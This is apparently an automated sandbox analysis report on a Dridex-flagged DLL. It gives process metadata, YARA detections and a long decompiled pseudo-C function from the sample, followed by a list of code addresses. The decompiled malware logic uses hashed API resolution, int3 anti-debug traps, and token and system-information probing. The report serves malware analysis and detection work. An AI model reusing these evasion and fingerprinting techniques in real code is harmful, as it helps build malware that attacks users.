                                                                                                      Analysis Process: rundll32.exe PID: 6484 Parent PID: 6376

                                                                                                      General

                                                                                                      Start time:17:26:22
                                                                                                      Start date:26/12/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:rundll32.exe "C:\Users\user\Desktop\G7ABVJxc3Z.dll",#1
                                                                                                      Imagebase:0xa50000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000002.831692261.000000006E471000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000000.733407707.000000006E471000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000000.734461323.000000006E471000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: WerFault.exe PID: 5728 Parent PID: 6484

                                                                                                      General

                                                                                                      Start time:17:26:57
                                                                                                      Start date:26/12/2021
                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6484 -s 740
                                                                                                      Imagebase:0x2b0000
                                                                                                      File size:434592 bytes
                                                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: WerFault.exe PID: 4864 Parent PID: 6496

                                                                                                      General

                                                                                                      Start time:17:27:01
                                                                                                      Start date:26/12/2021
                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6496 -s 864
                                                                                                      Imagebase:0x2b0000
                                                                                                      File size:434592 bytes
                                                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Disassembly

                                                                                                      Code Analysis

                                                                                                      Reset < >

                                                                                                        Analysis Process: loaddll32.exe PID: 6380 Parent PID: 5204 loaddll32.exeCOMMON

                                                                                                        Executed Functions

                                                                                                        Function 6E480730, Relevance: 5.2, APIs: 3, Instructions: 650COMMONCrypto
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 83%
                                                                                                        			E6E480730(void* __ecx) {
				void* __esi;
				intOrPtr _t155;
				signed char* _t159;
				char _t162;
				void* _t180;
				intOrPtr _t189;
				char _t190;
				intOrPtr _t196;
				intOrPtr _t200;
				void* _t203;
				void* _t212;
				void* _t213;
				void* _t215;
				void* _t216;
				void* _t223;
				void* _t238;
				void* _t241;
				void* _t244;
				void* _t247;
				void* _t250;
				void* _t254;
				void* _t259;
				void* _t265;
				void* _t268;
				int _t271;
				void* _t272;
				void* _t276;
				void* _t277;
				void* _t278;
				void* _t282;
				int _t288;
				intOrPtr* _t291;
				signed char _t294;
				signed char _t295;
				intOrPtr* _t320;
				intOrPtr* _t325;
				intOrPtr* _t363;
				char _t364;
				intOrPtr* _t372;
				void* _t377;
				void* _t382;
				void* _t383;
				void* _t384;
				void* _t385;
				void* _t386;
				void* _t387;
				void* _t393;
				void* _t395;
				void* _t401;
				void* _t403;
				intOrPtr* _t404;
				signed int _t406;
				intOrPtr* _t409;
				void* _t411;
				signed int _t413;
				void* _t414;
				void* _t415;
				void* _t420;
				intOrPtr* _t423;
				void* _t425;
				void** _t427;
				void* _t428;
				void* _t429;

				_t414 = __ecx;
				_t155 =  *0x6e48d1f8;
				if(_t155 == 0x4c71e88d) {
					_t155 = E6E48361C(0x30);
					 *0x6e48d1f8 = _t155;
				}
				if( *((char*)(_t155 + 0xb)) == 0 || _t414 != 0) {
					_t415 = _t428 + 0x48;
					E6E483698(_t415, 0, 0x11c);
					_t429 = _t428 + 0xc;
					 *((intOrPtr*)(_t429 + 0x48)) = 0x11c;
					if(E6E48306C(0x8e844d1e, 0xcf311107, 0x8e844d1e, 0x8e844d1e) != 0) {
						_push(_t415);
						asm("int3");
						asm("int3");
					}
					_t404 =  *0x6e48d1f8;
					_t159 = _t429 + 0x4c;
					_t294 =  *_t159;
					 *(_t404 + 8) = _t294;
					_t295 = _t159[4];
					 *(_t404 + 9) = _t295;
					 *((char*)(_t404 + 0xa)) = _t159[0x110];
					 *((intOrPtr*)(_t404 + 4)) =  *((intOrPtr*)(_t429 + 0x54));
					 *((char*)(_t404 + 0xc)) = 0 | _t159[0x116] != 0x00000001;
					 *_t404 = (_t295 & 0x000000ff) + ((_t294 & 0x000000ff) << 4) - 0x50;
					_t162 = E6E480FF8(_t404);
					 *(_t429 + 0x198) = 0;
					 *((char*)( *0x6e48d1f8 + 0xb)) = _t162;
					_t363 = E6E48306C(0x150c05fc, 0x1da4d409, _t162, _t162);
					if(_t363 == 0) {
						L12:
						_t364 = 0;
						L13:
						 *((char*)( *0x6e48d1f8 + 0x28)) = _t364;
						if( *((intOrPtr*)(E6E480730(0))) >= 0x10) {
							_push(6);
							memcpy(_t429 + 0x164, 0x6e48bce0, 0 << 2);
							_t429 = _t429 + 0xc;
							 *((intOrPtr*)(_t429 + 0x1c)) = 0;
							E6E47F584(_t429 + 0x24, 0);
							_t406 = 0;
							__eflags = 0;
							do {
								E6E47F828(_t429 + 0x24, E6E47F4CC(_t429 + 0x20) + 4);
								 *((intOrPtr*)(E6E47F4BC(_t429 + 0x24, E6E47F4CC(_t429 + 0x20) + 0xfffffffc))) =  *((intOrPtr*)(_t429 + 0x164 + _t406 * 4));
								_t406 = _t406 + 1;
								 *((intOrPtr*)(_t429 + 0x1c)) =  *((intOrPtr*)(_t429 + 0x1c)) + 1;
								__eflags = _t406 - 6;
							} while (_t406 < 6);
							_push(0);
							E6E485580(_t429 + 0xc, _t429 + 0x1c, 0x80000002);
							E6E47F654(_t429 + 0x20);
							E6E4855B0(_t429 + 8, _t429 + 0x1c0, 0xc0092a94);
							_t180 = E6E485864(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c0)));
							_t407 = _t180;
							E6E47DFA4(_t429 + 0x1c0);
							__eflags = _t180;
							if(_t180 != 0) {
								E6E4855B0(_t429 + 8, _t429 + 0x1c8, 0x1e55aaec);
								_t420 = E6E485864(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c8)));
								E6E47DFA4(_t429 + 0x1c8);
								_t407 = _t429 + 0x1d0;
								E6E4855B0(_t429 + 8, _t429 + 0x1d0, 0x360d0c74);
								_t401 = E6E485864(_t429 + 4, __eflags,  *(_t429 + 0x1d0));
								E6E47DFA4(_t429 + 0x1d0);
								__eflags = _t420;
								if(_t420 != 0) {
									__eflags = _t420 - 5;
									if(_t420 != 5) {
										__eflags = _t420 - 2;
										if(_t420 != 2) {
											L58:
											E6E47CFDC(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L65:
												_t189 = 0;
												__eflags = 0;
												 *(_t429 + 4) = 0;
												goto L66;
											}
											_t382 =  *(_t429 + 4);
											__eflags = _t382;
											if(_t382 == 0) {
												L61:
												_t238 = 1;
												L63:
												__eflags = _t238;
												if(_t238 == 0) {
													E6E485558(_t382);
												}
												goto L65;
											}
											__eflags = _t382 - 0xffffffff;
											if(_t382 != 0xffffffff) {
												_t238 = 0;
												__eflags = 0;
												goto L63;
											}
											goto L61;
										}
										__eflags = _t401 - 1;
										if(_t401 != 1) {
											goto L58;
										}
										E6E47CFDC(_t429 + 0xc);
										__eflags =  *((char*)(_t429 + 8));
										if( *((char*)(_t429 + 8)) == 0) {
											L57:
											 *(_t429 + 4) = 0;
											_t189 = 5;
											goto L66;
										}
										_t383 =  *(_t429 + 4);
										__eflags = _t383;
										if(_t383 == 0) {
											L53:
											_t241 = 1;
											L55:
											__eflags = _t241;
											if(_t241 == 0) {
												E6E485558(_t383);
											}
											goto L57;
										}
										__eflags = _t383 - 0xffffffff;
										if(_t383 != 0xffffffff) {
											_t241 = 0;
											__eflags = 0;
											goto L55;
										}
										goto L53;
									}
									__eflags = _t401;
									if(_t401 != 0) {
										__eflags = _t401 - 1;
										if(_t401 == 1) {
											E6E47CFDC(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L121:
												 *(_t429 + 4) = 0;
												_t189 = 4;
												goto L66;
											}
											_t384 =  *(_t429 + 4);
											__eflags = _t384;
											if(_t384 == 0) {
												L117:
												_t244 = 1;
												L119:
												__eflags = _t244;
												if(_t244 == 0) {
													E6E485558(_t384);
												}
												goto L121;
											}
											__eflags = _t384 - 0xffffffff;
											if(_t384 != 0xffffffff) {
												_t244 = 0;
												__eflags = 0;
												goto L119;
											}
											goto L117;
										}
										goto L58;
									}
									E6E47CFDC(_t429 + 0xc);
									__eflags =  *((char*)(_t429 + 8));
									if( *((char*)(_t429 + 8)) == 0) {
										L45:
										 *(_t429 + 4) = 0;
										_t189 = 3;
										goto L66;
									}
									_t385 =  *(_t429 + 4);
									__eflags = _t385;
									if(_t385 == 0) {
										L41:
										_t247 = 1;
										L43:
										__eflags = _t247;
										if(_t247 == 0) {
											E6E485558(_t385);
										}
										goto L45;
									}
									__eflags = _t385 - 0xffffffff;
									if(_t385 != 0xffffffff) {
										_t247 = 0;
										__eflags = 0;
										goto L43;
									}
									goto L41;
								}
								__eflags = _t401;
								if(_t401 != 0) {
									goto L58;
								}
								E6E47CFDC(_t429 + 0xc);
								__eflags =  *((char*)(_t429 + 8));
								if( *((char*)(_t429 + 8)) == 0) {
									L35:
									 *(_t429 + 4) = 0;
									_t189 = 2;
									goto L66;
								}
								_t386 =  *(_t429 + 4);
								__eflags = _t386;
								if(_t386 == 0) {
									L31:
									_t250 = 1;
									L33:
									__eflags = _t250;
									if(_t250 == 0) {
										E6E485558(_t386);
									}
									goto L35;
								}
								__eflags = _t386 - 0xffffffff;
								if(_t386 != 0xffffffff) {
									_t250 = 0;
									__eflags = 0;
									goto L33;
								}
								goto L31;
							}
							E6E47CFDC(_t429 + 0xc);
							__eflags =  *((char*)(_t429 + 8));
							if( *((char*)(_t429 + 8)) == 0) {
								L25:
								 *(_t429 + 4) = 0;
								_t189 = 1;
								goto L66;
							}
							_t387 =  *(_t429 + 4);
							__eflags = _t387;
							if(_t387 == 0) {
								L21:
								_t254 = 1;
								L23:
								__eflags = _t254;
								if(_t254 == 0) {
									E6E485558(_t387);
								}
								goto L25;
							}
							__eflags = _t387 - 0xffffffff;
							if(_t387 != 0xffffffff) {
								_t254 = 0;
								__eflags = 0;
								goto L23;
							}
							goto L21;
						} else {
							_t189 = 1;
							L66:
							 *((intOrPtr*)( *0x6e48d1f8 + 0x24)) = _t189;
							_t190 = E6E481030(0xffffffffffffffff);
							_t320 =  *0x6e48d1f8;
							 *((char*)(_t320 + 0x29)) = _t190;
							 *((intOrPtr*)(_t320 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
							if( *_t320 >= 0x10) {
								__eflags = 0xffffffffffffffff;
								 *((intOrPtr*)( *0x6e48d1f8 + 0x2c)) = E6E4810A4(0xffffffffffffffff);
								L78:
								if(E6E48306C(0x8e844d1e, 0x925d7fea, 0x8e844d1e, 0x8e844d1e) != 0) {
									GetSystemInfo(_t429 + 0x164); // executed
								}
								_t196 =  *0x6e48d1f8;
								_t291 = _t429 + 0x178;
								_t409 = _t429 + 0x170;
								 *((short*)(_t196 + 0xe)) =  *_t291;
								 *((intOrPtr*)(_t196 + 0x10)) =  *((intOrPtr*)(_t291 - 0x10));
								 *((intOrPtr*)(_t196 + 0x14)) =  *((intOrPtr*)(_t291 - 0xc));
								 *((intOrPtr*)(_t196 + 0x18)) =  *_t409;
								 *((intOrPtr*)(_t196 + 0x1c)) =  *((intOrPtr*)(_t409 + 0x10));
								return _t196;
							}
							 *(_t429 + 0x19c) = 0;
							_t372 = E6E48306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
							if(_t372 == 0) {
								L74:
								_t200 =  *0x6e48d1f8;
								if( *((char*)(_t200 + 0x28)) == 0) {
									 *((intOrPtr*)(_t200 + 0x2c)) = 3;
								} else {
									 *((intOrPtr*)(_t200 + 0x2c)) = 5;
								}
								goto L78;
							}
							_push(_t429 + 0x19c);
							_push(8);
							_push(0xffffffff);
							if( *_t372() == 0) {
								_t203 = E6E4835F0(_t407);
								__eflags = _t203;
								if(_t203 != 0) {
									goto L74;
								}
							}
							 *(_t429 + 0x30) =  *(_t429 + 0x19c);
							 *((char*)(_t429 + 0x34)) = 1;
							 *(_t429 + 0x1a4) = 0;
							_t325 = E6E48306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
							if(_t325 != 0) {
								_push(_t429 + 0x1a4);
								_push(0);
								_push(0);
								_push(1);
								_push( *(_t429 + 0x1ac));
								if( *_t325() == 0) {
									E6E4835F0(_t407);
								}
							}
							_t206 =  *(_t429 + 0x1a4);
							if( *(_t429 + 0x1a4) != 0) {
								E6E47F584(_t429 + 0x18c, _t206);
								_t411 = E6E48306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
								__eflags = _t411;
								if(_t411 == 0) {
									L133:
									E6E47F654(_t429 + 0x188);
									goto L72;
								}
								_t212 = E6E47F4BC(_t429 + 0x18c, 0);
								_t213 = E6E47F4CC(_t429 + 0x188);
								_t215 =  *_t411( *(_t429 + 0x1ac), 1, _t212, _t213, _t429 + 0x1a4);
								__eflags = _t215;
								if(_t215 == 0) {
									_t216 = E6E4835F0(_t411);
									__eflags = _t216;
									if(_t216 != 0) {
										goto L133;
									}
								}
								_t423 = E6E47F4BC(_t429 + 0x18c, 0);
								E6E47DF4C(_t429 + 0x1b4, 0);
								 *(_t429 + 0x1ac) = 0;
								_t377 = E6E48306C(0x150c05fc, 0xfc1a24a1, 0x150c05fc, 0x150c05fc);
								__eflags = _t377;
								if(_t377 != 0) {
									 *_t377( *_t423, _t429 + 0x1ac);
								}
								E6E47DFC0(_t429 + 0x1b4,  *(_t429 + 0x1ac));
								_t223 = E6E48306C(0x8e844d1e, 0xda6a2597, 0x8e844d1e, 0x8e844d1e);
								__eflags = _t223;
								if(_t223 != 0) {
									_push( *(_t429 + 0x1ac));
									asm("int3");
									asm("int3");
								}
								E6E47E06C(_t429 + 0x1b8 - 8, _t429 + 0x1b8);
								_t425 = E6E484FFC( *((intOrPtr*)(_t429 + 0x1b8)), E6E47E8A8( *((intOrPtr*)(_t429 + 0x1b8)), 0x7fffffff));
								E6E47DFA4(_t429 + 0x1b8);
								E6E47DFA4(_t429 + 0x1b0);
								E6E47F654(_t429 + 0x188);
								__eflags =  *((char*)(_t429 + 0x34));
								if( *((char*)(_t429 + 0x34)) != 0) {
									E6E47BB44(_t429 + 0x30);
								}
								__eflags = _t425 - 0x6df4cf7;
								if(_t425 != 0x6df4cf7) {
									goto L74;
								} else {
									 *((intOrPtr*)( *0x6e48d1f8 + 0x2c)) = 6;
									goto L78;
								}
							} else {
								L72:
								if( *((char*)(_t429 + 0x34)) != 0) {
									E6E47BB44(_t429 + 0x30);
								}
								goto L74;
							}
						}
					}
					_push(_t429 + 0x198);
					_push(8);
					_push(0xffffffff);
					if( *_t363() == 0) {
						_t259 = E6E4835F0(_t404);
						__eflags = _t259;
						if(_t259 != 0) {
							goto L12;
						}
					}
					 *(_t429 + 0x14) =  *(_t429 + 0x198);
					 *((char*)(_t429 + 0x18)) = 1;
					 *(_t429 + 0x1a0) = 0;
					if(E6E48306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) != 0) {
						_t288 = GetTokenInformation( *(_t429 + 0x1a8), 2, 0, 0, _t429 + 0x1a0); // executed
						if(_t288 == 0) {
							E6E4835F0(_t404);
						}
					}
					_t262 =  *(_t429 + 0x1a0);
					if( *(_t429 + 0x1a0) != 0) {
						E6E47F584(_t429 + 0x3c, _t262);
						_t265 = E6E48306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
						_t407 = _t265;
						__eflags = _t265;
						if(_t265 == 0) {
							L107:
							E6E47F654(_t429 + 0x38);
							goto L10;
						}
						_t268 = E6E47F4BC(_t429 + 0x3c, 0);
						_t271 = GetTokenInformation( *(_t429 + 0x1a8), 2, _t268, E6E47F4CC(_t429 + 0x38), _t429 + 0x1a0); // executed
						__eflags = _t271;
						if(_t271 == 0) {
							_t272 = E6E4835F0(_t407);
							__eflags = _t272;
							if(_t272 != 0) {
								goto L107;
							}
						}
						_t427 = E6E47F4BC(_t429 + 0x3c, 0);
						 *(_t429 + 0x1d8 - 0x30) = 0;
						asm("movsd");
						asm("movsb");
						asm("movsb");
						_t407 = E6E48306C(0x150c05fc, 0x2351aaca, 0x150c05fc, 0x150c05fc);
						__eflags = _t407;
						if(_t407 == 0) {
							goto L107;
						}
						_t276 = _t429 + 0x1a8;
						_t277 =  *_t407(_t276 + 0x30, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t276);
						__eflags = _t277;
						if(_t277 == 0) {
							_t278 = E6E4835F0(_t407);
							__eflags = _t278;
							if(_t278 != 0) {
								goto L107;
							}
						}
						_t403 =  *(_t429 + 0x1a8);
						__eflags =  *_t427;
						if( *_t427 <= 0) {
							L101:
							__eflags = _t403;
							if(_t403 == 0) {
								L103:
								_t393 = 1;
								L105:
								__eflags = _t393;
								if(_t393 == 0) {
									E6E480FD4(_t403, _t407, _t403);
								}
								goto L107;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t393 = 0;
								__eflags = 0;
								goto L105;
							}
							goto L103;
						}
						_t413 = 0;
						__eflags = 0;
						do {
							_t282 = E6E48306C(0x150c05fc, 0xb4757511, 0x150c05fc, 0x150c05fc);
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							_push( *((intOrPtr*)(_t427 + 4 + _t413 * 8)));
							_push( *(_t429 + 0x1ac));
							asm("int3");
							asm("int3");
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							__eflags = _t403;
							if(_t403 == 0) {
								L93:
								_t395 = 1;
								L95:
								__eflags = _t395;
								if(_t395 == 0) {
									E6E480FD4(_t403, _t413, _t403);
								}
								E6E47F654(_t429 + 0x38);
								__eflags =  *((char*)(_t429 + 0x18));
								if( *((char*)(_t429 + 0x18)) != 0) {
									E6E47BB44(_t429 + 0x14);
								}
								_t364 = 1;
								goto L13;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t395 = 0;
								__eflags = 0;
								goto L95;
							}
							goto L93;
							L100:
							_t413 = _t413 + 1;
							__eflags = _t413 -  *_t427;
						} while (_t413 <  *_t427);
						goto L101;
					}
					L10:
					if( *((char*)(_t429 + 0x18)) != 0) {
						E6E47BB44(_t429 + 0x14);
					}
					goto L12;
				} else {
					return _t155;
				}
			}


































































                                                                                                        0x6e48073f
                                                                                                        0x6e480741
                                                                                                        0x6e480748
                                                                                                        0x6e480fc7
                                                                                                        0x6e480fcd
                                                                                                        0x6e480fcd
                                                                                                        0x6e480752
                                                                                                        0x6e48075e
                                                                                                        0x6e48076a
                                                                                                        0x6e48076f
                                                                                                        0x6e48077c
                                                                                                        0x6e48078d
                                                                                                        0x6e48078f
                                                                                                        0x6e480790
                                                                                                        0x6e480791
                                                                                                        0x6e480791
                                                                                                        0x6e480792
                                                                                                        0x6e480796
                                                                                                        0x6e48079a
                                                                                                        0x6e48079f
                                                                                                        0x6e4807a2
                                                                                                        0x6e4807a8
                                                                                                        0x6e4807c2
                                                                                                        0x6e4807c9
                                                                                                        0x6e4807cc
                                                                                                        0x6e4807cf
                                                                                                        0x6e4807d1
                                                                                                        0x6e4807dd
                                                                                                        0x6e4807ea
                                                                                                        0x6e4807f7
                                                                                                        0x6e4807fb
                                                                                                        0x6e480887
                                                                                                        0x6e480887
                                                                                                        0x6e480889
                                                                                                        0x6e48088d
                                                                                                        0x6e480898
                                                                                                        0x6e4808ae
                                                                                                        0x6e4808b1
                                                                                                        0x6e4808b1
                                                                                                        0x6e4808b5
                                                                                                        0x6e4808be
                                                                                                        0x6e4808c3
                                                                                                        0x6e4808c3
                                                                                                        0x6e4808c5
                                                                                                        0x6e4808d6
                                                                                                        0x6e4808f8
                                                                                                        0x6e4808fa
                                                                                                        0x6e4808fb
                                                                                                        0x6e4808ff
                                                                                                        0x6e4808ff
                                                                                                        0x6e480908
                                                                                                        0x6e480914
                                                                                                        0x6e48091d
                                                                                                        0x6e480933
                                                                                                        0x6e480943
                                                                                                        0x6e480948
                                                                                                        0x6e48094c
                                                                                                        0x6e480951
                                                                                                        0x6e480953
                                                                                                        0x6e4809a3
                                                                                                        0x6e4809b8
                                                                                                        0x6e4809bc
                                                                                                        0x6e4809c1
                                                                                                        0x6e4809d2
                                                                                                        0x6e4809e7
                                                                                                        0x6e4809eb
                                                                                                        0x6e4809f0
                                                                                                        0x6e4809f2
                                                                                                        0x6e480a39
                                                                                                        0x6e480a3c
                                                                                                        0x6e480a8a
                                                                                                        0x6e480a8d
                                                                                                        0x6e480ace
                                                                                                        0x6e480ad2
                                                                                                        0x6e480ad7
                                                                                                        0x6e480adc
                                                                                                        0x6e480afb
                                                                                                        0x6e480afb
                                                                                                        0x6e480afb
                                                                                                        0x6e480afd
                                                                                                        0x00000000
                                                                                                        0x6e480afd
                                                                                                        0x6e480ade
                                                                                                        0x6e480ae2
                                                                                                        0x6e480ae4
                                                                                                        0x6e480aeb
                                                                                                        0x6e480aeb
                                                                                                        0x6e480af1
                                                                                                        0x6e480af1
                                                                                                        0x6e480af3
                                                                                                        0x6e480af6
                                                                                                        0x6e480af6
                                                                                                        0x00000000
                                                                                                        0x6e480af3
                                                                                                        0x6e480ae6
                                                                                                        0x6e480ae9
                                                                                                        0x6e480aef
                                                                                                        0x6e480aef
                                                                                                        0x00000000
                                                                                                        0x6e480aef
                                                                                                        0x00000000
                                                                                                        0x6e480ae9
                                                                                                        0x6e480a8f
                                                                                                        0x6e480a92
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e480a98
                                                                                                        0x6e480a9d
                                                                                                        0x6e480aa2
                                                                                                        0x6e480ac1
                                                                                                        0x6e480ac1
                                                                                                        0x6e480acb
                                                                                                        0x00000000
                                                                                                        0x6e480acb
                                                                                                        0x6e480aa4
                                                                                                        0x6e480aa8
                                                                                                        0x6e480aaa
                                                                                                        0x6e480ab1
                                                                                                        0x6e480ab1
                                                                                                        0x6e480ab7
                                                                                                        0x6e480ab7
                                                                                                        0x6e480ab9
                                                                                                        0x6e480abc
                                                                                                        0x6e480abc
                                                                                                        0x00000000
                                                                                                        0x6e480ab9
                                                                                                        0x6e480aac
                                                                                                        0x6e480aaf
                                                                                                        0x6e480ab5
                                                                                                        0x6e480ab5
                                                                                                        0x00000000
                                                                                                        0x6e480ab5
                                                                                                        0x00000000
                                                                                                        0x6e480aaf
                                                                                                        0x6e480a3e
                                                                                                        0x6e480a40
                                                                                                        0x6e480a7f
                                                                                                        0x6e480a82
                                                                                                        0x6e480df4
                                                                                                        0x6e480df9
                                                                                                        0x6e480dfe
                                                                                                        0x6e480e1d
                                                                                                        0x6e480e1d
                                                                                                        0x6e480e27
                                                                                                        0x00000000
                                                                                                        0x6e480e27
                                                                                                        0x6e480e00
                                                                                                        0x6e480e04
                                                                                                        0x6e480e06
                                                                                                        0x6e480e0d
                                                                                                        0x6e480e0d
                                                                                                        0x6e480e13
                                                                                                        0x6e480e13
                                                                                                        0x6e480e15
                                                                                                        0x6e480e18
                                                                                                        0x6e480e18
                                                                                                        0x00000000
                                                                                                        0x6e480e15
                                                                                                        0x6e480e08
                                                                                                        0x6e480e0b
                                                                                                        0x6e480e11
                                                                                                        0x6e480e11
                                                                                                        0x00000000
                                                                                                        0x6e480e11
                                                                                                        0x00000000
                                                                                                        0x6e480e0b
                                                                                                        0x00000000
                                                                                                        0x6e480a88
                                                                                                        0x6e480a46
                                                                                                        0x6e480a4b
                                                                                                        0x6e480a50
                                                                                                        0x6e480a6f
                                                                                                        0x6e480a6f
                                                                                                        0x6e480a79
                                                                                                        0x00000000
                                                                                                        0x6e480a79
                                                                                                        0x6e480a52
                                                                                                        0x6e480a56
                                                                                                        0x6e480a58
                                                                                                        0x6e480a5f
                                                                                                        0x6e480a5f
                                                                                                        0x6e480a65
                                                                                                        0x6e480a65
                                                                                                        0x6e480a67
                                                                                                        0x6e480a6a
                                                                                                        0x6e480a6a
                                                                                                        0x00000000
                                                                                                        0x6e480a67
                                                                                                        0x6e480a5a
                                                                                                        0x6e480a5d
                                                                                                        0x6e480a63
                                                                                                        0x6e480a63
                                                                                                        0x00000000
                                                                                                        0x6e480a63
                                                                                                        0x00000000
                                                                                                        0x6e480a5d
                                                                                                        0x6e4809f4
                                                                                                        0x6e4809f6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e480a00
                                                                                                        0x6e480a05
                                                                                                        0x6e480a0a
                                                                                                        0x6e480a29
                                                                                                        0x6e480a29
                                                                                                        0x6e480a33
                                                                                                        0x00000000
                                                                                                        0x6e480a33
                                                                                                        0x6e480a0c
                                                                                                        0x6e480a10
                                                                                                        0x6e480a12
                                                                                                        0x6e480a19
                                                                                                        0x6e480a19
                                                                                                        0x6e480a1f
                                                                                                        0x6e480a1f
                                                                                                        0x6e480a21
                                                                                                        0x6e480a24
                                                                                                        0x6e480a24
                                                                                                        0x00000000
                                                                                                        0x6e480a21
                                                                                                        0x6e480a14
                                                                                                        0x6e480a17
                                                                                                        0x6e480a1d
                                                                                                        0x6e480a1d
                                                                                                        0x00000000
                                                                                                        0x6e480a1d
                                                                                                        0x00000000
                                                                                                        0x6e480a17
                                                                                                        0x6e480959
                                                                                                        0x6e48095e
                                                                                                        0x6e480963
                                                                                                        0x6e480982
                                                                                                        0x6e480982
                                                                                                        0x6e48098c
                                                                                                        0x00000000
                                                                                                        0x6e48098c
                                                                                                        0x6e480965
                                                                                                        0x6e480969
                                                                                                        0x6e48096b
                                                                                                        0x6e480972
                                                                                                        0x6e480972
                                                                                                        0x6e480978
                                                                                                        0x6e480978
                                                                                                        0x6e48097a
                                                                                                        0x6e48097d
                                                                                                        0x6e48097d
                                                                                                        0x00000000
                                                                                                        0x6e48097a
                                                                                                        0x6e48096d
                                                                                                        0x6e480970
                                                                                                        0x6e480976
                                                                                                        0x6e480976
                                                                                                        0x00000000
                                                                                                        0x6e480976
                                                                                                        0x00000000
                                                                                                        0x6e48089a
                                                                                                        0x6e48089c
                                                                                                        0x6e480b01
                                                                                                        0x6e480b06
                                                                                                        0x6e480b09
                                                                                                        0x6e480b0e
                                                                                                        0x6e480b10
                                                                                                        0x6e480b25
                                                                                                        0x6e480b28
                                                                                                        0x6e480bf6
                                                                                                        0x6e480bfe
                                                                                                        0x6e480c01
                                                                                                        0x6e480c16
                                                                                                        0x6e480c20
                                                                                                        0x6e480c20
                                                                                                        0x6e480c22
                                                                                                        0x6e480c24
                                                                                                        0x6e480c33
                                                                                                        0x6e480c3f
                                                                                                        0x6e480c43
                                                                                                        0x6e480c46
                                                                                                        0x6e480c49
                                                                                                        0x6e480c4c
                                                                                                        0x00000000
                                                                                                        0x6e480c4c
                                                                                                        0x6e480b38
                                                                                                        0x6e480b4a
                                                                                                        0x6e480b4e
                                                                                                        0x6e480bda
                                                                                                        0x6e480bda
                                                                                                        0x6e480be0
                                                                                                        0x6e480beb
                                                                                                        0x6e480be2
                                                                                                        0x6e480be2
                                                                                                        0x6e480be2
                                                                                                        0x00000000
                                                                                                        0x6e480be0
                                                                                                        0x6e480b5b
                                                                                                        0x6e480b5c
                                                                                                        0x6e480b5e
                                                                                                        0x6e480b64
                                                                                                        0x6e480fb3
                                                                                                        0x6e480fb8
                                                                                                        0x6e480fba
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e480fc0
                                                                                                        0x6e480b7b
                                                                                                        0x6e480b7f
                                                                                                        0x6e480b84
                                                                                                        0x6e480b96
                                                                                                        0x6e480b9a
                                                                                                        0x6e480ba5
                                                                                                        0x6e480ba6
                                                                                                        0x6e480ba7
                                                                                                        0x6e480ba8
                                                                                                        0x6e480baa
                                                                                                        0x6e480bb5
                                                                                                        0x6e480e2d
                                                                                                        0x6e480e2d
                                                                                                        0x6e480bb5
                                                                                                        0x6e480bbb
                                                                                                        0x6e480bc4
                                                                                                        0x6e480e3f
                                                                                                        0x6e480e55
                                                                                                        0x6e480e57
                                                                                                        0x6e480e59
                                                                                                        0x6e480f94
                                                                                                        0x6e480f9b
                                                                                                        0x00000000
                                                                                                        0x6e480f9b
                                                                                                        0x6e480e68
                                                                                                        0x6e480e76
                                                                                                        0x6e480e90
                                                                                                        0x6e480e92
                                                                                                        0x6e480e94
                                                                                                        0x6e480fa5
                                                                                                        0x6e480faa
                                                                                                        0x6e480fac
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e480fae
                                                                                                        0x6e480ea8
                                                                                                        0x6e480eb3
